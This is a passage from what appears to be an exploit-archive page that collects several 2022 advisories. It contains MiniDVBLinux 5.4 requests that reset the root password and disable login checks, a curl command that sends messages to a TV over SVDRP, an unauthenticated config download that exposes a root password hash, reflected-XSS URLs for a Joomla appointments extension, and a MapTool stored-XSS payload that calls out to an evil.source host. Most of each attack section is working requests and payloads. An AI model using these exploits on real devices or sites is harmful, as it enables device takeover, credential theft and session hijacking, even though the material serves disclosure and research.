/etc/setup/base.sh setversion<br />SYSTEM_VERSION: 5.4<br />SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword<br />SYSTEM_PASSWORD: r00t<br />BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi<br />BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd<br />BUSYBOX_NTPD: 1<br />LOG_LEVEL: 1<br />SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog<br />SYSLOG_SIZE: <br />LANG_command: /etc/setup/locales.sh setlang<br />LANG: en_GB.UTF-8<br />TIMEZONE_command: /etc/setup/locales.sh settimezone<br 
/>TIMEZONE: Europe/Kumanovo<br />KEYMAP_command: /etc/setup/locales.sh setkeymap<br />KEYMAP: de-latin1<br />action: save<br />params: <br />changed: SYSTEM_PASSWORD <br /><br /><br />Enable webif password check:<br />-----------------------------<br /><br />POST /?site=setup&section=System HTTP/1.1<br /><br />APT_UPGRADE_CHECK: 1<br />APT_SYSTEM_ID: 1<br />APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass<br />APT_PACKAGE_CLASS: stable<br />SYSTEM_NAME: MiniDVBLinux<br />SYSTEM_VERSION_command: /etc/setup/base.sh setversion<br />SYSTEM_VERSION: 5.4<br />SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword<br />SYSTEM_PASSWORD: <br />BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi<br />BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd<br />BUSYBOX_NTPD: 1<br />LOG_LEVEL: 1<br />SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog<br />SYSLOG_SIZE: <br />LANG_command: /etc/setup/locales.sh setlang<br />LANG: en_GB.UTF-8<br />TIMEZONE_command: /etc/setup/locales.sh settimezone<br />TIMEZONE: Europe/Berlin<br />KEYMAP_command: /etc/setup/locales.sh setkeymap<br />KEYMAP: de-latin1<br />WEBIF_PASSWORD_CHECK: 1<br />action: save<br />params: <br />changed: WEBIF_PASSWORD_CHECK <br /><br /><br />Disable webif password check:<br />-----------------------------<br /><br />POST /?site=setup&section=System HTTP/1.1<br /><br />APT_UPGRADE_CHECK: 1<br />APT_SYSTEM_ID: 1<br />APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclass<br />APT_PACKAGE_CLASS: stable<br />SYSTEM_NAME: MiniDVBLinux<br />SYSTEM_VERSION_command: /etc/setup/base.sh setversion<br />SYSTEM_VERSION: 5.4<br />SYSTEM_PASSWORD_command: /etc/setup/base.sh setpassword<br />SYSTEM_PASSWORD: <br />BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpi<br />BUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpd<br />BUSYBOX_NTPD: 1<br />LOG_LEVEL: 1<br />SYSLOG_SIZE_command: /etc/setup/init.sh setsyslog<br />SYSLOG_SIZE: <br />LANG_command: /etc/setup/locales.sh setlang<br />LANG: en_GB.UTF-8<br 
/>TIMEZONE_command: /etc/setup/locales.sh settimezone<br />TIMEZONE: Europe/Berlin<br />KEYMAP_command: /etc/setup/locales.sh setkeymap<br />KEYMAP: de-latin1<br />action: save<br />params: <br />changed: WEBIF_PASSWORD_CHECK <br /></code></pre>
<pre><code><br />MiniDVBLinux 5.4 Simple VideoDiskRecorder Protocol SVDRP (svdrpsend.sh) Exploit<br /><br /><br />Vendor: MiniDVBLinux<br />Product web page: https://www.minidvblinux.de<br />Affected version: <=5.4<br /><br />Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple<br />way to convert a standard PC into a Multi Media Centre based on the<br />Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this<br />Linux based Digital Video Recorder: Watch TV, Timer controlled<br />recordings, Time Shift, DVD and MP3 Replay, Setup and configuration<br />via browser, and a lot more. MLD strives to be as small as possible,<br />modular, simple. It supports numerous hardware platforms, like classic<br />desktops in 32/64bit and also various low power ARM systems.<br /><br />Desc: The application allows SVDRP protocol commands to be sent by a<br />remote attacker in order to manipulate and/or remotely control the<br />TV.<br /><br />Tested on: MiniDVBLinux 5.4<br /> BusyBox v1.25.1<br /> Architecture: armhf, armhf-rpi2<br /> GNU/Linux 4.19.127.203 (armv7l)<br /> VideoDiskRecorder 2.4.6<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5714<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5714.php<br /><br /><br />24.09.2022<br /><br />--<br /><br /><br />Send a message to the TV screen:<br /><br />curl http://ip:8008/?site=commands&section=system&command=svdrpsend.sh%20MESG%20WE%20ARE%20WATCHING%20YOU!<br /><br />220 mld SVDRP VideoDiskRecorder 2.4.6; Wed Sep 28 13:07:51 2022; UTF-8<br />250 Message queued<br />221 mld closing connection<br /><br />For more commands:<br /> - https://www.linuxtv.org/vdrwiki/index.php/SVDRP#The_commands<br /></code></pre>
<pre><code><br />MiniDVBLinux 5.4 Config Download Exploit<br /><br /><br />Vendor: MiniDVBLinux<br />Product web page: https://www.minidvblinux.de<br />Affected version: <=5.4<br /><br />Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple<br />way to convert a standard PC into a Multi Media Centre based on the<br />Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this<br />Linux based Digital Video Recorder: Watch TV, Timer controlled<br />recordings, Time Shift, DVD and MP3 Replay, Setup and configuration<br />via browser, and a lot more. MLD strives to be as small as possible,<br />modular, simple. It supports numerous hardware platforms, like classic<br />desktops in 32/64bit and also various low power ARM systems.<br /><br />Desc: The application is vulnerable to unauthenticated configuration<br />download when direct object reference is made to the backup function<br />using an HTTP GET request. This will enable the attacker to disclose<br />sensitive information and help her in authentication bypass, privilege<br />escalation and full system access.<br /><br />====================================================================<br />/var/www/tpl/setup/Backup/Edit\ backup/51_download_backup.sh:<br />------------------------------------------------------------<br />01: <?<br />02: if [ "$GET_action" = "getconfig" ]; then<br />03: . 
/etc/rc.config<br />04: header "Content-Type: application/x-compressed-tar"<br />05: header "Content-Disposition: filename=`date +%Y-%m-%d_%H%M_$HOST_NAME`_config.tgz"<br />06: /usr/bin/backup-config.sh export /tmp/backup_config_$$.tgz &>/dev/null<br />07: cat /tmp/backup_config_$$.tgz<br />08: rm -rf /tmp/backup_config*<br />09: exit<br />10: fi<br />11: ?><br />12: <div class="button"><input type="button" value="$(TEXTDOMAIN="backup-www" gt 'Download')" title="$(TEXTDOMAIN="backup-www" gt 'Download a archive of your config')" onclick="window.open('/tpl/setup/Backup/Edit backup/51_download_backup.sh?action=getconfig'); call('')"/></div><br /><br />====================================================================<br /><br />Tested on: MiniDVBLinux 5.4<br /> BusyBox v1.25.1<br /> Architecture: armhf, armhf-rpi2<br /> GNU/Linux 4.19.127.203 (armv7l)<br /> VideoDiskRecorder 2.4.6<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2022-5713<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5713.php<br /><br /><br />24.09.2022<br /><br />--<br /><br /><br />> curl http://ip:8008/tpl/setup/Backup/Edit%20backup/51_download_backup.sh?action=getconfig -o config.tgz<br />> mkdir configdir<br />> tar -xvzf config.tgz -C .\configdir<br />> cd configdir && cd etc<br />> type passwd<br />root:$1$ToYyWzqq$oTUM6EpspNot2e1eyOudO0:0:0:root:/root:/bin/sh<br />daemon:!:1:1::/:<br />ftp:!:40:2:FTP account:/:/bin/sh<br />user:!:500:500::/home/user:/bin/sh<br />nobody:!:65534:65534::/tmp:<br />_rpc:x:107:65534::/run/rpcbind:/usr/sbin/nologin<br />> <br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : extensions.joomla.org │<br />│ Vendor : e4j Extensions for Joomla - extensionsforjoomla.com │<br />│ Software : Joomla Vik Appointments 1.7.3 │<br />│ Vuln Type: Reflected XSS │<br />│ Method : GET │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ The attacker can send to victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. 
SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />GET parameter 'filters[group]' is vulnerable to XSS<br /><br />Path: /en/our-staff<br /> <br />https://extensionsforjoomla.com/livedemo/vikappointments/en/our-staff?filters[group]=ehfso%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ejo07p&filters[service]=1&filters[country]=236&filters[state]=2&filters[field_experience]=1&filters[distance]=5&filters[price]=50:180&ordering=4<br /><br /><br />GET parameter 'filters[country]' is vulnerable to XSS<br /><br />Path: /en/our-staff<br /><br />https://extensionsforjoomla.com/livedemo/vikappointments/en/our-staff?filters[country]=f1zzs%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3etpj3q&filters[distance]=5&filters[price]=25:300&start=5<br /><br /><br />GET parameter 'filters[service]' is vulnerable to XSS<br /><br />Path: /en/our-staff<br /><br />https://extensionsforjoomla.com/livedemo/vikappointments/en/our-staff?filters[group]=2&filters[service]=h9ool%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3euskap&filters[country]=236&filters[state]=2&filters[field_experience]=1&filters[distance]=5&filters[price]=50:180&ordering=4<br /><br /><br />GET parameter 'filters[distance]' is vulnerable to XSS<br /><br />Path: /en/our-staff<br /><br />https://extensionsforjoomla.com/livedemo/vikappointments/en/our-staff?filters[country]=236&filters[distance]=zi0c7%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3esw7i1&filters[price]=25:300&start=5<br /><br /><br />GET parameter 'filters[price]' is vulnerable to XSS<br /><br />Path: /en/our-staff<br /><br />https://extensionsforjoomla.com/livedemo/vikappointments/en/our-staff?filters[country]=236&filters[distance]=5&filters[price]=ofwz2%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3efixld&start=5<br /><br />GET 
parameter 'filters[state]' is vulnerable to XSS<br /><br />Path: /en/our-staff<br /><br />https://extensionsforjoomla.com/livedemo/vikappointments/en/our-staff?filters[group]=2&filters[service]=1&filters[country]=236&filters[state]=j4qvq%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ev0uw9&filters[field_experience]=1&filters[distance]=5&filters[price]=50:180&ordering=4<br /><br /><br />GET parameter 'filters[field_experience]' is vulnerable to XSS<br /><br />Path: /en/our-staff<br /><br />https://extensionsforjoomla.com/livedemo/vikappointments/en/our-staff?filters[group]=2&filters[service]=1&filters[country]=236&filters[state]=2&filters[field_experience]=ib06r%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3ebsg9b&filters[distance]=5&filters[price]=50:180&ordering=4<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>Document Title:<br />===============<br />MapTool v1.11.5 - Cross Site Scripting Vulnerabilities<br /><br /><br />References (Source):<br />====================<br />https://www.vulnerability-lab.com/get_content.php?id=2319<br /><br /><br />Release Date:<br />=============<br />2022-10-11<br /><br /><br />Vulnerability Laboratory ID (VL-ID):<br />====================================<br />2319<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />5.6<br /><br /><br />Vulnerability Class:<br />====================<br />Cross Site Scripting - Persistent<br /><br /><br />Current Estimated Price:<br />========================<br />500€ - 1.000€<br /><br /><br />Product & Service Introduction:<br />===============================<br />MapTool is a fully featured, flexible virtual tabletop. Not only does MapTool come with powerful tools for creating detailed maps<br />but also a chat function, an initiative tracker, and a detailed token management system to create characters, monsters, objects,<br />and anything you can imagine. MapTool's user interface is highly configurable, and features not being used can be hidden out of sight.<br />The latest version of MapTool can be found on GitHub. MapTool attempts to use Semantic Versioning to help groups know whether a change<br />may break their game or not so they can decide when to upgrade. Exciting new features can be tested in development (alpha or beta) builds,<br />but for your game where stability matters sticking to the major releases is recommended. 
MapTool campaigns saved in newer versions may not<br />work on older versions, so be careful with your campaign files when trying out development builds.<br /><br />(Copy of the Homepage:https://wiki.rptools.info/index.php/MapTool )<br />(Download Software:https://www.rptools.net/toolbox/download-rptools-products )<br /><br /><br />Abstract Advisory Information:<br />==============================<br />The vulnerability laboratory core research team discovered a persistent web vulnerability in the official MapTool v1.11.5 software.<br /><br />Affected Product(s):<br />====================<br />Rptools<br />Product: MapTool v1.11.5 - (Windows) (Linux) (MacOS)<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2022-06-03: Researcher Notification & Coordination (Security Researcher)<br />2022-06-04: Vendor Notification (Security Department)<br />2022-**-**: Vendor Response/Feedback (Security Department)<br />2022-**-**: Vendor Fix/Patch (Service Developer Team)<br />2022-**-**: Security Acknowledgements (Security Department)<br />2022-10-11: Public Disclosure (Vulnerability Laboratory)<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />Remote<br /><br /><br />Severity Level:<br />===============<br />Medium<br /><br /><br />Authentication Type:<br />====================<br />Restricted Authentication (Guest Privileges)<br /><br /><br />User Interaction:<br />=================<br />Low User Interaction<br /><br /><br />Disclosure Type:<br />================<br />Independent Security Research<br /><br /><br />Technical Details & Description:<br />================================<br />A persistent input validation web vulnerability has been discovered in the official MapTool v1.11.5 software.<br />The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector<br />to compromise browser 
to web-application requests from the application-side.<br /><br />The vulnerability is located in the Speicher den Nachrichtenverlauf (Save Message Logs) function, which exports<br />without securely encoding HTML entities. This allows remote attackers to send malicious payloads that are not<br />visible in the chat but are saved to the exported html file. Opening the html file directly executes the injected<br />script code payloads on the local computer system. The vulnerability can be used by actors to form malicious files<br />for malware, phishing or data exfiltration after local compromise.<br /><br />Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent<br />external redirects to malicious sources and persistent manipulation of affected application modules.<br /><br />Vulnerable Module(s):<br />[+] Chat<br /><br />Affected Module(s):<br />[+] Speicher den Nachrichtenverlauf<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />The persistent and non-persistent input validation web vulnerabilities can be exploited by remote attackers without a user account and with or without low user interaction.<br />For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.<br /><br /><br />PoC: Payload<br /><iframe src="http://evil.source/malicious.jsp?inject=<script>eval(name)</script>" name="alert(1337)"></iframe><br /><br /><br />Manual steps to reproduce the vulnerability:<br />1. Install the linux, windows or macos map software<br />2. Open the chat and inject the payload<br />3. Send the input to execute<br />4. Save the chat logs via settings (default html)<br />5. Open the exported html file with the chat communication<br />Note: Opening the file directly executes the payload<br />6. 
Successful reproduction of the non-persistent and persistent input validation vulnerability<br /><br /><br />PoC: Exploitation (test.html)<br /><table class="ava-msg"><br /><tbody><tr valign="top"><br /><td class="avatar"><br /></td><br /><td class="message"><br /><span class="prefix">Anonymer Benutzer:</span> <span><font color="#000000">evil.source[MALICIOUS SCRIPT CODE EXECUTION POINT]</font></span><br /></td><br /></tr><br /></tbody></table><br /></div><br /><div><br />"antlr.collections.AST.equalsTree(antlr.collections.AST)" because<br />"this.tree" is null Fehler beim Ausführen des Ausdrucks .<br /></div><br /><div><br />Fehlerspur: chat<br /></div><br /><div><br />"antlr.collections.AST.equalsTree(antlr.collections.AST)" because<br />"this.tree" is null Fehler beim Ausführen des Ausdrucks .<br /></div><br /><br /><br />Security Risk:<br />==============<br />The security risk of the persistent script code injection vulnerability in the maptool software is estimated as medium.<br /><br /><br />Credits & Authors:<br />==================<br />Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab<br /><br /><br />Disclaimer & Information:<br />=========================<br />The information provided in this advisory is provided as is without any warranty. Vulnerability Lab disclaims all warranties,<br />either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab<br />or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits<br />or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. 
Some states do<br />not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply.<br />We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.<br /><br />Domains: https://www.vulnerability-lab.com ; https://www.vuln-lab.com ; https://www.vulnerability-db.com<br /><br />Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory.<br />Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other<br />media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other<br />information on this website are trademarks of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or<br />edit our material contact (admin@ or research@) to ask for permission.<br /><br /> Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™<br /><br /><br /><br />-- <br />VULNERABILITY LABORATORY (VULNERABILITY LAB)<br />RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE<br /><br /></code></pre>